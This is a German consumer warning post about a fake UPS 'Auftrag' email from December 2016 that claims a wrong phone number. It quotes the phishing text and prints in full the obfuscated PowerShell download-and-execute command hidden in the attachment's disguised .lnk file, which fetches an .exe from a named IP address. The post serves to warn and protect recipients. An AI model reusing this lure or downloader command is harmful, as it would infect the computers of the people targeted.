Angeblich falsche Telefon-Nr. auf der UPS-Paketanmeldung? „Auftrag“ von [email protected]
Achtung: Klicken Sie nicht auf die Anlage der folgenden E-Mail! Die E-Mail ist gefälscht und stammt nicht von der United Parcel Service Deutschland Inc. & Co. OHG! Die Anlage lädt eine Datei aus dem Internet nach und führt diese aus!
Wenige Stunden vor dem Jahreswechsel 2016 / 2017 kommt am Samstag, dem 31. Dezember 2016 noch die folgende, durch unbekannte Dritte versendete betrügerische E-Mail:
Betreff: Auftrag
Absender: [email protected]Sehr geehrter Herr,
bei der Zustellung Ihrer Bestellung DE243419 hat der Paketbote versucht, Sie telefonisch
zu erreichen, leider ohne Gelingen. Aus diesem Grund wurde die Bestellung zuruck zur Sortierstelle gebracht.
Wir haben festgestellt, dass im Moment der Paketanmeldung eine falsche Telefonnummer angegeben wurde.
Wir bitten Sie den Lieferschein, den wir an dieses Schreiben angehangt haben, auszudrucken, und sich an die
nachstliegende UPS-Filiale zu wenden.Mit freundlichen GruBen,
United Parcel Service Deutschland Inc. & Co. OHG
Germany
Achtung: Es handelt sich um eine gefälschte E-Mail! Die E-Mail stammt nicht von der United Parcel Service Deutschland Inc. & Co. OHG! Das Unternehmen hat mit der E-Mail nichts zu tun!
Öffnen Sie daher nicht die Anlage!
In der .zip-Datei mit dem Namen „inv_9865192.zip“ ist ein Link enthalten, der beim Anklicken ausgeführt würde („inv3.doc.lnk“). Die meisten PC’s zeigen den Link aber nur mit dem Namen „inv3.doc“ an und lassen die Endung „.lnk“ weg:
In den Eigenschaften des Links ist zu sehen, dass eine Datei aus dem Internet nachgeladen und ausgeführt werden soll:
C:\Windows\System32\cmd.exe /c „P^o^W^er^Sh^e^ll.^exe -exEc^UtIonP^o^lI^Cy bYpaS^S -^NoPrOF^ILe (^N^E^W-ob^jEcT systeM.NET.wEB^clIE^nT).DoWn^LO^a^d^Fil^e^(‚http://46.30.43.107/gite.exe‘,’%appDatA%.exE‘)^;^s^TA^r^t^-P^R^o^c^eSs^ %appDatA%.exE“
Die IP-Adresse 46.30.43.107/gite.exe scheint entweder beim Test nicht aufrufbar gewesen zu sein oder hat wegen der Herkunft keine Daten geliefert. Klicken Sie dennoch nicht auf die Datei, sie kann jederzeit wieder erreichbar sein und den Rechner dann infizieren!